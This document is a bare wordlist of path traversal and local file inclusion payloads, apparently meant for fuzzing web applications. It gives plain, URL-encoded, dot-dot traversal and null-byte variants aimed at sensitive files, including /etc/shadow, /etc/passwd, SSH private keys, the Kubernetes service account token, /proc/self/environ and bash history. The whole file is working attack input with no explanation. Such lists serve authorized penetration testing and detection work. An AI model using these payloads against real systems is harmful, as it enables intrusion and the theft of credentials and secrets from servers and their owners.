/etc/passwd
/etc/passwd%00
/etc/passwd?
%2Fetc%2Fpasswd
%2Fetc%2Fpasswd%2500
%2Fetc%2Fpasswd%3F
../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../etc/passwd?
....//....//....//....//....//....//....//etc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%3F
/etc/knockd.conf
%2Fetc%2Fknockd.conf
../../../../../../etc/knockd.conf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fknockd.conf
/etc/issue
%2Fetc%2Fissue
../../../../../../etc/issue
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue
/etc/shadow
%2Fetc%2Fshadow
../../../../../../etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
/etc/group
%2Fetc%2Fgroup
../../../../../../etc/group
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup
/etc/hosts
%2Fetc%2Fhosts
../../../../../../etc/hosts
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts
/etc/motd
%2Fetc%2Fmotd
../../../../../../etc/motd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmotd
/etc/mysql/my.cnf
%2Fetc%2Fmysql%2Fmy.cnf
../../../../../../etc/mysql/my.cnf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmysql%2Fmy.cnf
/proc/[0-9]*/fd/[0-9]*
%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
../../../../../../proc/[0-9]*/fd/[0-9]*
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
/proc/self/environ
%2Fproc%2Fself%2Fenviron
../../../../../../proc/self/environ
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
/proc/version
%2Fproc%2Fversion
../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion
/proc/cmdline
%2Fproc%2Fcmdline
../../../../../../proc/cmdline
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fcmdline
/proc/sched_debug
%2Fproc%2Fsched_debug
../../../../../../proc/sched_debug
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fsched_debug
/proc/mounts
%2Fproc%2Fmounts
../../../../../../proc/mounts
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fmounts
/proc/net/arp
%2Fproc%2Fnet%2Farp
../../../../../../proc/net/arp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Farp
/proc/net/route
%2Fproc%2Fnet%2Froute
../../../../../../proc/net/route
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Froute
/proc/net/tcp
%2Fproc%2Fnet%2Ftcp
../../../../../../proc/net/tcp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Ftcp
/home/$USER/.bash_history
%2Fhome%2F%24USER%2F.bash_history
../../../../../../home/$USER/.bash_history
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.bash_history
/home/$USER/.ssh/id_rsa
%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
../../../../../../home/$USER/.ssh/id_rsa
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
/run/secrets/kubernetes.io/serviceaccount/token
%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
../../../../../../run/secrets/kubernetes.io/serviceaccount/token
..%2F..%2F..%2F..%2F..%2F..%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
/var/lib/mlocate/mlocate.db
%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
../../../../../../var/lib/mlocate/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
/var/lib/mlocate.db
%2Fvar%2Flib%2Fmlocate.db
../../../../../../var/lib/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate.db
